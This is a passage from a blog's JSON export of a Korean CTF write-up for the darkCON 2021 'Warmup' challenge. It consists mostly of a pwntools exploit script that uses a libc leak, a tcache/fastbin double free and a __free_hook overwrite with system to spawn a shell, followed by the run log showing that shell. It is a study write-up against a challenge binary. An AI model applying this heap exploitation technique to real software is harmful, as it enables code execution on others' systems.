data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/a.out\")\ne = ELF('.\/a.out',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef create(idx, size, data):\n    sla(b\"[3] - exit\\n\", b\"1\")\n    sla(\"index: \", str(idx))\n    sla(\"size: \", str(size))\n    sla(b\"input: \", data)\n\ndef delete(idx):\n    sla(b\"[3] - exit\\n\", b\"2\")\n    sla(\"index: \", str(idx))\n\ndef exit():\n    sla(b\"[3] - exit\\n\", b\"3\")\n\nru(b\"gift: \")\nleak = rl().split(b\"\\n\")[0]\nleak = int(leak, 16)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - 0xb6200\ninfo(f\"libc base: {hex(l.address)}\")\nfree_hook = l.sym.__free_hook\ninfo(\"free_hook: \" + hex(free_hook))\nsystem = l.sym.system\ninfo(\"system: \" + hex(system))\n\n# Fill up tcache, alloc10 &amp; free7\nfor i in range(10):\n    create(i, 0x10, b\"A\"*8)\n\nfor i in range(7):\n    delete(i)\n\n#fastbin_dup\ndelete(7)\ndelete(8)\ndelete(7)\n\n#empty tcache\nfor i in range(7):\n    create(i, 0x10, b\"C\"*8)\n\n\n#Let's AAW!\ncreate(7, 0x10, p64(free_hook))\ncreate(8, 0x10, b\"D\"*8)\ncreate(9, 0x10, '\/bin\/sh\\x00')\n\ncreate(10, 0x10, p64(system))\n\ndelete(9)\n\n\npi()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@ubuntu:~\/study\/warmup$ python3 solve2.py\n[+] Starting local process '.\/a.out': pid 14824\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 5)\n[*] leak: 0x7ffff7a98200\n[*] libc base: 0x7ffff79e2000\n[*] free_hook: 0x7ffff7dcf8e8\n[*] system: 0x7ffff7a31420\n[*] Switching to interactive mode\n$ id\nuid=1000(seo) gid=1000(seo) groups=1000(seo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)\n$ whoami\nseo\n$ uname -a\nLinux ubuntu 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU\/Linux\n$ .\/libc.so.6\nGNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.\nCopyright (C) 2018 Free Software Foundation, Inc.\nThis is free software; see the source for copying conditions.\nThere is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE.\nCompiled by GNU CC version 7.5.0.\nlibc ABIs: UNIQUE IFUNC\nFor bug reporting instructions, please see:\n&lt;https:\/\/bugs.launchpad.net\/ubuntu\/+source\/glibc\/+bugs>.\n$\n[*] Interrupted\n[*] Stopped process '.\/a.out' (pid 14824)\nseo@ubuntu:~\/study\/warmup$<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\uc694\uc57d \uc774\ubc88\uc5d0 \ubb38\uc81c\ub97c \ud480\uba74\uc11c \ud560\ub2f9\ud560\ub54c fastbin\uc774\ub098 tcache\uac00 \ub4e4\uc5b4\uac00\ub294\uac8c \uc544\ub2cc, free\ud560\ub54c \ub4e4\uc5b4\uac00\ub294\uac83\uc744 \uae68\ub2ec\uc558\ub2e4. (\uc774\ub54c\uae4c\uc9c0 \uc798\ubabb \uc54c\uace0 \uc788\uc5c8\ub124\u3160) 1st alloc &#8211; (free_hook \ud3ec\uc778\ud130 \uc8fc\uc18c)AAW\ud560 \uc8fc\uc18c \ub300\uc0c1\uc73c\ub85c \uc500. 2nd alloc &#8211; \ub354\ubbf8\ub85c \uc500. 3rd alloc &#8211; (\/bin\/sh) \uac12\uc744 \uc500. 4th alloc &#8211; (system \ud568\uc218 \uc8fc\uc18c)AAW \ub36e\uc744 \uac12\uc73c\ub85c \uc500. \ud658\uacbd \uc6b0\ubd84\ud22c 18.04 \/ GLIBC 2.27-3ubuntu1.6 Source https:\/\/github.com\/sajjadium\/ctf-archives\/tree\/main\/ctfs\/darkCON\/2021\/pwn\/Warmup checksec 1.&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3626\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[darkCON2021] warmup (fastbin_dup, glibc 2.27)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[19],"tags":[53,54,56,35,25],"class_list":["post-3626","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fastbin","tag-fastbin_dup","tag-glibc_2-27","tag-heap","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3626","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3626"}],"version-history":[{"count":7,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3626\/revisions"}],"predecessor-version":[{"id":3646,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3626\/revisions\/3646"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3626"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3626"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3626"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}